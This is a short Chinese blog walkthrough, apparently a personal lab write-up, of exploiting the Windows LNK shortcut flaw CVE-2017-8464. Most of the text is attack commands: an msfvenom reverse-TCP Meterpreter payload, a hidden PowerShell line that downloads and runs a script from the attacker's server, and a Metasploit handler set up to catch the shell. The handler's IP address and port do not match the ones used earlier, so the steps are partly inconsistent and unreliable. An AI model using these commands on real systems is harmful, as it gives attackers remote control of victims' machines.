CVE-2017-8464 有更新!

  WarrenRyan

情报收集

  北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞
CVE-2017-8464 ,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
  前段时间在知乎上看到了CVE-2017-8464漏洞的利用过程,一直想尝试一下,今天特地抽空尝试了一下。
  其实这个漏洞挺无聊的,和之前的 OFFICE OLE2LINK 漏洞 ( CVE-2017-0199 )很接近,本质上都是在解析文件的时候有漏洞,从而能执行任意代码。
环境:
  攻击机:KaliLinux(有web服务器) ip:192.168.1.110
  靶机:WindowsServer2008R2 ip:192.168.1.111

1.利用Msf生成后门

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.110 lport=5555 -f psh-reflection;/var/www/html/t.ps1

2.生成LNK快捷方式文件

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.110/t.ps1');test.ps1"

Powershell
3.在metesploit中监听,在靶机上运行LNK文件,弹回shell

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.0.101 
msf exploit(handler) > set LPORT 6666 msf exploit(handler) > show options 
msf exploit(handler) > run

msf